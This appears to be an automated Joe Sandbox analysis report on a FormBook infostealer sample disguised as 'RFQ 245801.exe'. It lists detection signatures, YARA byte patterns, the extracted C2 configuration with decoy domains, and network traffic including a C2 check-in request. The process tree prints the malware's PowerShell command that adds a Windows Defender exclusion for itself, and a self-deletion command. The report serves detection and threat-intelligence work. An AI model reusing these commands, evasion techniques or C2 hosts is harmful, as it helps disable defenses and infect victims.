Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ 245801.exe

Overview

General Information

Sample name:RFQ 245801.exe
Analysis ID:1528045
MD5:4be29153bc863fa6d2914aab9759e6aa
SHA1:eb30dab7d18b7bbf2673573cc96da82f6374d85b
SHA256:ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
Tags:exeuser-Maciej8910871
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ 245801.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
    • powershell.exe (PID: 1508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RFQ 245801.exe (PID: 916 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
    • RFQ 245801.exe (PID: 4280 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • NETSTAT.EXE (PID: 7156 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 7072 cmdline: /c del "C:\Users\user\Desktop\RFQ 245801.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.RFQ 245801.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.RFQ 245801.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.RFQ 245801.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.RFQ 245801.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.RFQ 245801.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-07T14:47:43.845330+020020314531Malware Command and Control Activity Detected192.168.2.449743188.114.96.380TCP
          2024-10-07T14:48:45.319943+020020314531Malware Command and Control Activity Detected192.168.2.450012185.26.122.7080TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: RFQ 245801.exeReversingLabs: Detection: 44%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: RFQ 245801.exeJoe Sandbox ML: detected
          Source: RFQ 245801.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: RFQ 245801.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: netstat.pdbGCTL source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 4x nop then jmp 07339222h0_2_07339684
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 4x nop then jmp 07339222h0_2_0733989E

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.ridges-freezers-56090.bond/c24t/
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: global trafficHTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA8F82 getaddrinfo,setsockopt,recv,6_2_0FBA8F82
          Source: global trafficHTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1Host: www.j88.travelConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.j88.travel
          Source: global trafficDNS traffic detected: DNS query: www.venir-bienne.info
          Source: global trafficDNS traffic detected: DNS query: www.ridges-freezers-56090.bond
          Source: global trafficDNS traffic detected: DNS query: www.oko.events
          Source: global trafficDNS traffic detected: DNS query: www.earing-tests-69481.bond
          Source: global trafficDNS traffic detected: DNS query: www.458881233.men
          Source: global trafficDNS traffic detected: DNS query: www.delark.click
          Source: global trafficDNS traffic detected: DNS query: www.ilw.legal
          Source: global trafficDNS traffic detected: DNS query: www.02s-pest-control-us-ze.fun
          Source: global trafficDNS traffic detected: DNS query: www.sx9u.shop
          Source: global trafficDNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: RFQ 245801.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: RFQ 245801.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: RFQ 245801.exeString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000006.00000002.4157692270.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4155839185.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1741977210.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: RFQ 245801.exe, 00000000.00000002.1746477242.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.02s-pest-control-us-ze.fun
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shop
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.02s-pest-control-us-ze.funReferer:
